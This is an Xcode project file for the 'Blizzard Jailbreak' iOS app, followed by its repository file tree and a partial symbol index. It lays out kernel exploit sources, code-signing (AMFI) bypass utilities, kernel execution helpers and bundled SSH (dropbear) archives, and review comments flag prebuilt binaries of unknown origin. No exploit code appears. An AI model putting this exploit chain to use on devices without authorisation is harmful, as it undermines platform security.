D69C4CB7256868BB001DE2BC /* IOKitLib.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
D69C4CB8256868BB001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = "<group>"; };
D69C4CBB25686D0F001DE2BC /* freethesandbox.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = freethesandbox.h; sourceTree = "<group>"; };
D6FFA56024E1A59A00CAC2E2 /* blizzardView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardView.h; sourceTree = "<group>"; };
D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardView.m; sourceTree = "<group>"; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
82F179E922DF4ED700231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
D69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */,
D613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */,
D613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */,
D613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */,
D613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */,
D613B74824E2B1E70069CA9B /* libplist.a in Frameworks */,
D613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */,
D613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0122DF4ED800231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0C22DF4ED800231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
82F179E322DF4ED700231F8C = {
isa = PBXGroup;
children = (
D69C4C9525686579001DE2BC /* Exploits */,
D62BC51C24E4112300EC63D4 /* Base Binaries */,
D613B73A24E2B13E0069CA9B /* Helper Libraries */,
D613B71D24E2A68D0069CA9B /* APFS Utilities */,
D613B71C24E2A6690069CA9B /* AMFI Utilities */,
D62CA1DF24E1C6FB002E6756 /* Kernel Utilities */,
D62CA1DB24E1C660002E6756 /* PatchFinder */,
D6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */,
82F17A0722DF4ED800231F8C /* sock_port_tests */,
82F17A1222DF4ED800231F8C /* sock_port_UITests */,
82F179ED22DF4ED700231F8C /* Products */,
82F17A2722DF57B700231F8C /* Frameworks */,
);
sourceTree = "<group>";
};
82F179ED22DF4ED700231F8C /* Products */ = {
isa = PBXGroup;
children = (
82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */,
82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */,
82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */,
);
name = Products;
sourceTree = "<group>";
};
82F179EE22DF4ED700231F8C /* sock_port */ = {
isa = PBXGroup;
children = (
D69C4C9D256866A2001DE2BC /* OSMessageNotification.h */,
82F17A2122DF4EF100231F8C /* exploit.c */,
82F17A2222DF4EF100231F8C /* exploit.h */,
82F17A2422DF4F1C00231F8C /* exploit_utilities.c */,
82F17A2522DF4F1C00231F8C /* exploit_utilities.h */,
8288501022E07303005D10FC /* kernel_memory.c */,
8288501122E07303005D10FC /* kernel_memory.h */,
8288501422E07C14005D10FC /* offsets.h */,
8288501322E07C14005D10FC /* offsets.m */,
D62CA1EC24E1C83E002E6756 /* offsetof.c */,
D62CA1ED24E1C83E002E6756 /* offsetof.h */,
82E9B71422E24BAD0016AA39 /* iosurface.c */,
82E9B71322E24BAC0016AA39 /* iosurface.h */,
);
path = sock_port;
sourceTree = "<group>";
};
82F17A0722DF4ED800231F8C /* sock_port_tests */ = {
isa = PBXGroup;
children = (
82F17A0822DF4ED800231F8C /* socket_freeTests.m */,
82F17A0A22DF4ED800231F8C /* Info.plist */,
);
path = sock_port_tests;
sourceTree = "<group>";
};
82F17A1222DF4ED800231F8C /* sock_port_UITests */ = {
isa = PBXGroup;
children = (
82F17A1322DF4ED800231F8C /* socket_freeUITests.m */,
82F17A1522DF4ED800231F8C /* Info.plist */,
);
path = sock_port_UITests;
sourceTree = "<group>";
};
/*
 * Group "Frameworks": navigator folder for the libraries the project links.
 * It is declared with `name`, not `path`, so it has no directory of its own.
 *
 * NOTE(review): libimg4tool.a, libmerged.a, liboffsetfinder64.a, libplist.a
 * and libplist++.a are prebuilt static archives with no source in this
 * project. The same five names are referenced a second time, under different
 * object IDs, in the "Helper Libraries" group, and IOKit.tbd is referenced
 * three times here under three different IDs. With duplicate references it
 * is not obvious which copy is linked; confirm against the app target's
 * Frameworks build phase and drop the unused ones.
 *
 * NOTE(review): `kerneldec` has no entry in the repository listing for this
 * commit, so its origin cannot be checked from the tree. Confirm where it
 * comes from before building.
 */
82F17A2722DF57B700231F8C /* Frameworks */ = {
isa = PBXGroup;
children = (
D69C4C96256865BF001DE2BC /* IOKit.tbd */,
D69C4C9825686627001DE2BC /* IOKit.tbd */,
D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */,
D613B74A24E2B2560069CA9B /* libcompression.tbd */,
D613B72E24E2A7B70069CA9B /* libimg4tool.a */,
D613B72D24E2A7B70069CA9B /* libmerged.a */,
D613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */,
D613B72B24E2A7B70069CA9B /* libplist.a */,
D613B72C24E2A7B70069CA9B /* libplist++.a */,
D62CA20A24E1D95F002E6756 /* kerneldec */,
82F17A2822DF57B700231F8C /* IOKit.tbd */,
);
name = Frameworks;
sourceTree = "<group>";
};
D613B71C24E2A6690069CA9B /* AMFI Utilities */ = {
isa = PBXGroup;
children = (
D613B75E24E2EEFD0069CA9B /* osobject.c */,
D613B75F24E2EEFD0069CA9B /* osobject.h */,
D613B75D24E2E8690069CA9B /* cs_blob.h */,
D613B75224E2E8300069CA9B /* amfi_utils.h */,
D613B75324E2E8300069CA9B /* amfi_utils.m */,
D613B75524E2E8300069CA9B /* amfid_mem.h */,
D613B75624E2E8300069CA9B /* amfid_mem.m */,
D613B75124E2E82F0069CA9B /* amfid_tools.h */,
D613B75424E2E8300069CA9B /* amfid_tools.m */,
D613B75A24E2E8580069CA9B /* amfid.h */,
D613B75B24E2E8580069CA9B /* amfid.m */,
);
path = "AMFI Utilities";
sourceTree = "<group>";
};
D613B71D24E2A68D0069CA9B /* APFS Utilities */ = {
isa = PBXGroup;
children = (
D613B73724E2A8C40069CA9B /* IOKit.h */,
D613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */,
D613B72624E2A76A0069CA9B /* offsetfinder.cpp */,
D613B72424E2A76A0069CA9B /* rootfs_remount.m */,
D613B72524E2A76A0069CA9B /* rootfs_remount.h */,
D613B73624E2A8B00069CA9B /* snapshot_tools.h */,
D613B73424E2A8AB0069CA9B /* snapshot_tools.c */,
);
path = "APFS Utilities";
sourceTree = "<group>";
};
D613B73A24E2B13E0069CA9B /* Helper Libraries */ = {
isa = PBXGroup;
children = (
D613B73F24E2B1540069CA9B /* libimg4tool.a */,
D613B73E24E2B1530069CA9B /* libmerged.a */,
D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */,
D613B73C24E2B1530069CA9B /* libplist.a */,
D613B73D24E2B1530069CA9B /* libplist++.a */,
);
path = "Helper Libraries";
sourceTree = "<group>";
};
/*
 * Group "Base Binaries": file references for the payload files shipped with
 * the app (two tar archives and a file named `tar`). None of them is built
 * from source by this project; they are opaque artifacts.
 *
 * NOTE(review): the repository listing for this commit shows only `tar`
 * under "Base Binaries/". basebins.tar and dropbear.tar are referenced here
 * but are not in that listing, so their origin cannot be established from
 * the tree. Confirm where they are obtained, and keep an expected SHA-256
 * for each artifact next to the project so a replaced file is noticed.
 */
D62BC51C24E4112300EC63D4 /* Base Binaries */ = {
isa = PBXGroup;
children = (
D62BC51F24E41AF500EC63D4 /* basebins.tar */,
D62BC52124E41F2500EC63D4 /* dropbear.tar */,
D62BC51D24E4113200EC63D4 /* tar */,
);
path = "Base Binaries";
sourceTree = "<group>";
};
D62CA1DB24E1C660002E6756 /* PatchFinder */ = {
isa = PBXGroup;
children = (
D62CA1E324E1C7EA002E6756 /* patchfinder64.h */,
D62CA1E424E1C7EA002E6756 /* patchfinder64.m */,
);
path = PatchFinder;
sourceTree = "<group>";
};
D62CA1DF24E1C6FB002E6756 /* Kernel Utilities */ = {
isa = PBXGroup;
children = (
D613B73824E2A99B0069CA9B /* system_reboot.h */,
D62CA1E924E1C7FF002E6756 /* kernel_utils.h */,
D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */,
D62CA1E624E1C7F7002E6756 /* kexecute.c */,
D62CA1E724E1C7F7002E6756 /* kexecute.h */,
D613B76424E2F2D30069CA9B /* kernSymbolication.c */,
D613B76524E2F2D30069CA9B /* kernSymbolication.h */,
D613B78124E2F9980069CA9B /* lzssdec.hpp */,
D613B78024E2F9980069CA9B /* lzssdec.cpp */,
);
path = "Kernel Utilities";
sourceTree = "<group>";
};
D69C4C9525686579001DE2BC /* Exploits */ = {
isa = PBXGroup;
children = (
D69C4CB4256868A8001DE2BC /* IOKit */,
D69C4CA125686866001DE2BC /* FreeTheSandbox */,
82F179EE22DF4ED700231F8C /* sock_port */,
);
path = Exploits;
sourceTree = "<group>";
};
/*
 * Group "FreeTheSandbox": sources and headers under Exploits/FreeTheSandbox.
 *
 * NOTE(review): vnode.h and xpc.h are each referenced twice under different
 * object IDs (D69C4CAD.../D69C4CA3... and D69C4CA8.../D69C4CA2...), while the
 * repository listing shows a single copy of each in this directory. The
 * PBXFileReference entries are outside this excerpt, so it cannot be told
 * from here whether both IDs resolve to the same file. Confirm, and remove
 * the stale reference so the header that is compiled is unambiguous.
 */
D69C4CA125686866001DE2BC /* FreeTheSandbox */ = {
isa = PBXGroup;
children = (
D69C4CAB25686895001DE2BC /* ios_7st_utils.m */,
D69C4CA725686894001DE2BC /* ios13_change_offsets.m */,
D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */,
D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */,
D69C4CA625686894001DE2BC /* ios13_userspace.c */,
D69C4CBB25686D0F001DE2BC /* freethesandbox.h */,
D69C4CA925686894001DE2BC /* IOTypes.h */,
D69C4CAA25686895001DE2BC /* libsnappy.c */,
D69C4CAC25686895001DE2BC /* libsnappy.h */,
D69C4CAD25686895001DE2BC /* vnode.h */,
D69C4CA825686894001DE2BC /* xpc.h */,
D69C4CA325686884001DE2BC /* vnode.h */,
D69C4CA225686884001DE2BC /* xpc.h */,
);
path = FreeTheSandbox;
sourceTree = "<group>";
};
D69C4CB4256868A8001DE2BC /* IOKit */ = {
isa = PBXGroup;
children = (
D69C4CB6256868BB001DE2BC /* IOKitKeys.h */,
D69C4CB7256868BB001DE2BC /* IOKitLib.h */,
D69C4CB5256868BB001DE2BC /* IOReturn.h */,
D69C4CB8256868BB001DE2BC /* IOTypes.h */,
);
path = IOKit;
sourceTree = "<group>";
};
D6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */ = {
isa = PBXGroup;
children = (
82F179FD22DF4ED700231F8C /* Info.plist */,
82F179EF22DF4ED700231F8C /* AppDelegate.h */,
82F179F022DF4ED700231F8C /* AppDelegate.m */,
82F179F822DF4ED700231F8C /* Assets.xcassets */,
82F179FE22DF4ED700231F8C /* main.m */,
82F179F522DF4ED700231F8C /* Main.storyboard */,
82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */,
D63EDAC024E1989F009B305D /* blizzardJailbreak.h */,
D63EDABF24E1989F009B305D /* blizzardJailbreak.m */,
D6FFA56024E1A59A00CAC2E2 /* blizzardView.h */,
D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */,
D613B71924E217D90069CA9B /* BlizzardLog.h */,
D613B71A24E217D90069CA9B /* BlizzardLog.m */,
D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */,
D613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */,
);
path = "Blizzard Jailbreak";
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXNativeTarget section */
82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard Jailbreak" */;
buildPhases = (
82F179E822DF4ED700231F8C /* Sources */,
82F179E922DF4ED700231F8C /* Frameworks */,
82F179EA22DF4ED700231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
);
name = "Blizzard Jailbreak";
productName = socket_free;
productReference = 82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */;
productType = "com.apple.product-type.application";
};
82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard JailbreakTests" */;
buildPhases = (
82F17A0022DF4ED800231F8C /* Sources */,
82F17A0122DF4ED800231F8C /* Frameworks */,
82F17A0222DF4ED800231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
82F17A0622DF4ED800231F8C /* PBXTargetDependency */,
);
name = "Blizzard JailbreakTests";
productName = socket_freeTests;
productReference = 82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */;
productType = "com.apple.product-type.bundle.unit-test";
};
82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard JailbreakUITests" */;
buildPhases = (
82F17A0B22DF4ED800231F8C /* Sources */,
82F17A0C22DF4ED800231F8C /* Frameworks */,
82F17A0D22DF4ED800231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
82F17A1122DF4ED800231F8C /* PBXTargetDependency */,
);
name = "Blizzard JailbreakUITests";
productName = socket_freeUITests;
productReference = 82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */;
productType = "com.apple.product-type.bundle.ui-testing";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
82F179E422DF4ED700231F8C /* Project object */ = {
isa = PBXProject;
attributes = {
LastUpgradeCheck = 1010;
ORGANIZATIONNAME = GeoSn0w;
TargetAttributes = {
82F179EB22DF4ED700231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
};
82F17A0322DF4ED800231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
TestTargetID = 82F179EB22DF4ED700231F8C;
};
82F17A0E22DF4ED800231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
TestTargetID = 82F179EB22DF4ED700231F8C;
};
};
};
buildConfigurationList = 82F179E722DF4ED700231F8C /* Build configuration list for PBXProject "Blizzard Jailbreak" */;
compatibilityVersion = "Xcode 8.0";
developmentRegion = en;
hasScannedForEncodings = 0;
knownRegions = (
en,
Base,
);
mainGroup = 82F179E322DF4ED700231F8C;
productRefGroup = 82F179ED22DF4ED700231F8C /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */,
82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */,
82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
/*
 * Resources build phase of the "Blizzard Jailbreak" app target: each entry
 * in `files` is processed into the built app bundle.
 *
 * NOTE(review): tar, basebins.tar and dropbear.tar are bundled as-is. The
 * app target's buildPhases list only Sources, Frameworks and Resources, so
 * no step visible in this project compares these files with a known digest
 * before they are packaged. Verify their provenance out of band and pin a
 * checksum (or build them from source) so a substituted archive is detected
 * at build time rather than on the device.
 */
82F179EA22DF4ED700231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */,
82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */,
D62BC51E24E4113200EC63D4 /* tar in Resources */,
D62BC52024E41AF500EC63D4 /* basebins.tar in Resources */,
D62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */,
82F179F722DF4ED700231F8C /* Main.storyboard in Resources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0222DF4ED800231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0D22DF4ED800231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
82F179E822DF4ED700231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */,
D613B75724E2E8300069CA9B /* amfi_utils.m in Sources */,
D6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */,
D62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */,
D69C4CB225686895001DE2BC /* libsnappy.c in Sources */,
D69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */,
D69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */,
D613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */,
82F179FF22DF4ED700231F8C /* main.m in Sources */,
D613B75824E2E8300069CA9B /* amfid_tools.m in Sources */,
D613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */,
D613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */,
D613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */,
D613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */,
D62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */,
82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */,
82F17A2322DF4EF100231F8C /* exploit.c in Sources */,
D613B75C24E2E8590069CA9B /* amfid.m in Sources */,
82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */,
D613B75924E2E8300069CA9B /* amfid_mem.m in Sources */,
D62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */,
D69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */,
D613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */,
D613B76024E2EEFD0069CA9B /* osobject.c in Sources */,
8288501522E07C15005D10FC /* offsets.m in Sources */,
D69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */,
8288501222E07303005D10FC /* kernel_memory.c in Sources */,
D613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */,
D62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */,
D63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */,
D69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0022DF4ED800231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0B22DF4ED800231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin PBXTargetDependency section */
82F17A0622DF4ED800231F8C /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;
targetProxy = 82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */;
};
82F17A1122DF4ED800231F8C /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;
targetProxy = 82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */;
};
/* End PBXTargetDependency section */
/* Begin PBXVariantGroup section */
82F179F522DF4ED700231F8C /* Main.storyboard */ = {
isa = PBXVariantGroup;
children = (
82F179F622DF4ED700231F8C /* Base */,
);
name = Main.storyboard;
sourceTree = "<group>";
};
82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */ = {
isa = PBXVariantGroup;
children = (
82F179FB22DF4ED700231F8C /* Base */,
);
name = LaunchScreen.storyboard;
sourceTree = "<group>";
};
/* End PBXVariantGroup section */
/* Begin XCBuildConfiguration section */
82F17A1622DF4ED800231F8C /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "iPhone Developer";
COPY_PHASE_STRIP = NO;
DEBUG_INFORMATION_FORMAT = dwarf;
ENABLE_STRICT_OBJC_MSGSEND = YES;
ENABLE_TESTABILITY = YES;
GCC_C_LANGUAGE_STANDARD = gnu
gitextract_8ln0kc37/
├── .gitignore
├── AMFI Utilities/
│ ├── amfi_utils.h
│ ├── amfi_utils.m
│ ├── amfid.h
│ ├── amfid.m
│ ├── amfid_mem.h
│ ├── amfid_mem.m
│ ├── amfid_tools.h
│ ├── amfid_tools.m
│ ├── cs_blob.h
│ ├── osobject.c
│ └── osobject.h
├── APFS Utilities/
│ ├── IOKit.h
│ ├── liboffsetfinder64.hpp
│ ├── offsetfinder.cpp
│ ├── rootfs_remount.h
│ ├── rootfs_remount.m
│ ├── snapshot_tools.c
│ └── snapshot_tools.h
├── Base Binaries/
│ └── tar
├── Blizzard Jailbreak/
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets/
│ │ ├── AppIcon.appiconset/
│ │ │ └── Contents.json
│ │ ├── Contents.json
│ │ ├── button_mask.imageset/
│ │ │ └── Contents.json
│ │ ├── jailbreak_wallpaper.imageset/
│ │ │ └── Contents.json
│ │ ├── snow.imageset/
│ │ │ └── Contents.json
│ │ └── winter.imageset/
│ │ └── Contents.json
│ ├── Base.lproj/
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── BlizzardLog.h
│ ├── BlizzardLog.m
│ ├── BlizzardSpawnerTools.c
│ ├── BlizzardSpawnerTools.h
│ ├── Info.plist
│ ├── blizzardJailbreak.h
│ ├── blizzardJailbreak.m
│ ├── blizzardView.h
│ ├── blizzardView.m
│ └── main.m
├── Blizzard Jailbreak.xcodeproj/
│ ├── project.pbxproj
│ ├── project.xcworkspace/
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata/
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata/
│ │ ├── geosn0w.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── jakejames.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ └── pwn20wnd.xcuserdatad/
│ │ └── UserInterfaceState.xcuserstate
│ ├── xcshareddata/
│ │ └── xcschemes/
│ │ └── sock_port.xcscheme
│ └── xcuserdata/
│ ├── geosn0w.xcuserdatad/
│ │ └── xcdebugger/
│ │ └── Breakpoints_v2.xcbkptlist
│ ├── jakejames.xcuserdatad/
│ │ ├── xcdebugger/
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes/
│ │ └── xcschememanagement.plist
│ └── pwn20wnd.xcuserdatad/
│ └── xcschemes/
│ └── xcschememanagement.plist
├── Exploits/
│ ├── FreeTheSandbox/
│ │ ├── IOTypes.h
│ │ ├── freethesandbox.h
│ │ ├── ios13_change_offsets.m
│ │ ├── ios13_kernel_universal.c
│ │ ├── ios13_userspace.c
│ │ ├── ios13_userspace_pac.c
│ │ ├── ios_7st_utils.m
│ │ ├── libsnappy.c
│ │ ├── libsnappy.h
│ │ ├── vnode.h
│ │ └── xpc.h
│ ├── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ └── IOTypes.h
│ └── sock_port/
│ ├── exploit.c
│ ├── exploit.h
│ ├── exploit_utilities.c
│ ├── exploit_utilities.h
│ ├── include/
│ │ └── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── iosurface.c
│ ├── iosurface.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── offsetof.c
│ ├── offsetof.h
│ ├── offsets.h
│ └── offsets.m
├── Helper Libraries/
│ ├── libimg4tool.a
│ ├── libmerged.a
│ ├── liboffsetfinder64.a
│ ├── libplist++.a
│ └── libplist.a
├── Kernel Utilities/
│ ├── kernSymbolication.c
│ ├── kernSymbolication.h
│ ├── kernel_utils.h
│ ├── kernel_utils.m
│ ├── kexecute.c
│ ├── kexecute.h
│ ├── lzssdec.cpp
│ ├── lzssdec.hpp
│ └── system_reboot.h
├── LICENSE
├── PatchFinder/
│ ├── patchfinder64.h
│ └── patchfinder64.m
├── README.md
└── Vanity/
└── readme.md
SYMBOL INDEX (442 symbols across 36 files)
FILE: AMFI Utilities/amfi_utils.h
type trust_chain (line 9) | struct trust_chain {
type cs_hash (line 27) | struct cs_hash
FILE: AMFI Utilities/amfid.h
type exception_raise_request (line 26) | typedef struct {
type exception_raise_reply (line 34) | typedef struct {
FILE: AMFI Utilities/cs_blob.h
type CodeDirectory (line 5) | typedef struct __attribute__((packed)) {
type CS_BlobIndex (line 43) | typedef struct __attribute__((packed)) {
type CS_SuperBlob (line 48) | typedef struct __attribute__((packed)) {
type SC_Scatter (line 56) | typedef struct __SC_Scatter {
type CS_GenericBlob (line 128) | typedef struct __SC_GenericBlob {
type CS_CodeDirectory (line 137) | typedef struct __CodeDirectory {
type cs_blob (line 182) | struct cs_blob {
type cs_hash (line 220) | struct cs_hash {
FILE: AMFI Utilities/osobject.c
function OSDictionary_SetItem (line 19) | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
function _OSDictionary_GetItem (line 30) | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
function OSDictionary_GetItem (line 41) | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
function OSDictionary_Merge (line 49) | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
function OSArray_Merge (line 55) | int OSArray_Merge(uint64_t array, uint64_t aArray) {
function _OSArray_GetObject (line 61) | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
function OSArray_GetObject (line 67) | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
function OSArray_RemoveObject (line 75) | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
function _OSUnserializeXML (line 80) | uint64_t _OSUnserializeXML(const char* buffer) {
function OSUnserializeXML (line 90) | uint64_t OSUnserializeXML(const char* buffer) {
function OSObject_Release (line 98) | void OSObject_Release(uint64_t osobject) {
function OSObject_Retain (line 104) | void OSObject_Retain(uint64_t osobject) {
function OSObject_GetRetainCount (line 110) | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
function OSString_GetLength (line 116) | unsigned int OSString_GetLength(uint64_t osstring){
FILE: APFS Utilities/IOKit.h
type mach_port_t (line 14) | typedef mach_port_t io_service_t;
type mach_port_t (line 15) | typedef mach_port_t io_connect_t;
type mach_port_t (line 16) | typedef mach_port_t io_object_t;
type io_object_t (line 17) | typedef io_object_t io_registry_entry_t;
FILE: APFS Utilities/liboffsetfinder64.hpp
type tihmstar (line 22) | namespace tihmstar {
class exception (line 23) | class exception : public std::exception{
method exception (line 27) | exception(int code, std::string err) : _err(err), _code(code) {}
method exception (line 28) | exception(std::string err) : _err(err), _code(0) {}
method exception (line 29) | exception(int code) : _code(code) {}
method code (line 31) | int code(){return _code;}
